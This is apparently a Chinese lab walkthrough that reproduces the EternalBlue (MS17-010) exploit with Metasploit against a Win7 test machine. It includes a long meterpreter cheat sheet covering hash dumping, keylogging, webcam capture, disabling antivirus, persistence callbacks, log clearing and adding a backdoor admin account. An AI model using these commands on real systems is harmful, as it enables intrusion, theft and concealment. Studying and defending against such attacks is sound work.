天天看點

永恒之藍 MS17-010 漏洞複現

目錄

    • 0x01 漏洞介紹
    • 0x02 環境部署:
    • 0x03 漏洞複現
        • 1. 資訊收集:
        • 2. 使用Metasploit進行測試漏洞
        • 3. 漏洞利用
    • 0x04 漏洞修複

0x01 漏洞介紹

  1. 漏洞描述

    Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠端代碼執行漏洞,惡意代碼會掃描開放445檔案共享端口的Windows機器,無需使用者任何操作,隻要開機上網,不法分子就能在電腦和伺服器中植入勒索軟體、遠端控制木馬、虛拟貨币挖礦機等惡意程式。

SMB服務在Windows與UNIX系列OS之間搭起一座橋梁,讓兩者的資源可互通有無。
  1. 漏洞編号

    CVE-2017-0143

    CVE-2017-0144

    CVE-2017-0145

    CVE-2017-0146

    CVE-2017-0148

  2. 受影響版本

    已知受影響的Windows 版本包括但不限于

    WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

    這裡列舉的這些,但還

0x02 環境部署:

kali 【攻擊機】 ip:192.168.30.182

win7 【受害機】 ip:192.168.30.203

實驗中需要關閉win7防火牆

0x03 漏洞複現

1. 資訊收集:

1.1主機發現

nmap -sn 192.168.30.0/24
           
永恒之藍 MS17-010 漏洞複現

1.2 端口掃描

masscan --rate=10000 --ports 0-65535 192.168.30.203
           
永恒之藍 MS17-010 漏洞複現

發現主機開放139,445端口

1.3 詳細掃描

nmap -T4 -sV -O -p 445,139 192.168.30.203
           
永恒之藍 MS17-010 漏洞複現

2. 使用Metasploit進行測試漏洞

2.1 開啟metasploit

永恒之藍 MS17-010 漏洞複現

2.2 選中使用子產品

use auxiliary/scanner/smb/smb_ms17_010
           
永恒之藍 MS17-010 漏洞複現

2.3 檢視選項,并設定參數

永恒之藍 MS17-010 漏洞複現

2.4 運作

永恒之藍 MS17-010 漏洞複現

發現該目标主機存在MS17-010漏洞

3. 漏洞利用

3.1 選中子產品

use exploit/windows/smb/ms17_010_eternalblue
           
永恒之藍 MS17-010 漏洞複現

3.2檢視選項,設定參數

永恒之藍 MS17-010 漏洞複現
永恒之藍 MS17-010 漏洞複現

3.3運作,拿到shell

永恒之藍 MS17-010 漏洞複現
永恒之藍 MS17-010 漏洞複現

在meterpreter > 中我們可以使用以下的指令來實作對目标的操作

sysinfo             #檢視目标主機系統資訊
run scraper         #檢視目标主機詳細資訊
run hashdump        #導出密碼的哈希
load kiwi           #加載
ps                  #檢視目标主機程序資訊
pwd                 #檢視目标目前目錄(windows)
getlwd              #檢視目标目前目錄(Linux)
search -f *.jsp -d e:\                #搜尋E盤中所有以.jsp為字尾的檔案
download  e:\test.txt  /root          #将目标機的e:\test.txt檔案下載下傳到/root目錄下
upload    /root/test.txt d:\test      #将/root/test.txt上傳到目标機的 d:\test\ 目錄下getpid              #檢視目前Meterpreter Shell的程序
PIDmigrate 1384     #将目前Meterpreter Shell的程序遷移到PID為1384的程序上
idletime            #檢視主機運作時間
getuid              #檢視擷取的目前權限
getsystem           #提權
run  killav         #關閉防毒軟體
screenshot          #截圖
webcam_list         #檢視目标主機的攝像頭
webcam_snap         #拍照
webcam_stream       #開視訊
execute  參數  -f 可執行檔案   #執行可執行程式
run getgui -u hack -p 123    #建立hack使用者,密碼為123
run getgui -e                #開啟遠端桌面
keyscan_start                #開啟鍵盤記錄功能
keyscan_dump                 #顯示捕捉到的鍵盤記錄資訊
keyscan_stop                 #停止鍵盤記錄功能
uictl  disable  keyboard     #禁止目标使用鍵盤
uictl  enable   keyboard     #允許目标使用鍵盤
uictl  disable  mouse        #禁止目标使用滑鼠
uictl  enable   mouse        #允許目标使用滑鼠
load                         #使用擴充庫
run				             #使用擴充庫
run persistence -X -i 5 -p 8888 -r 192.168.10.27        #反彈時間間隔是5s 會自動連接配接
                                   192.168.27的4444端口,缺點是容易被防毒軟體清除
portfwd add -l 3389 -r 192.168.11.13 -p 3389     #将192.168.11.13的3389端口轉發到本地的3389端口上,這裡的192.168.11.13是擷取權限的主機的ip位址
clearev                       #清除日志
           
  1. 創将一個新使用者,并添加至管理者組
#建立一個使用者
net user hack 123456 /add
#将使用者hack添加至管理者組
net localgroup administrators hack /add
#檢視目前管理者組成員
net localgroup administrators
           
永恒之藍 MS17-010 漏洞複現
永恒之藍 MS17-010 漏洞複現
永恒之藍 MS17-010 漏洞複現

0x04 漏洞修複

  1. 關閉139與445端口。
  2. 打開防火牆,安裝安全軟體。
  3. 線上更新;開啟Windows Update更新。
  4. 打更新檔;此漏洞對應的微軟更新檔位址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

繼續閱讀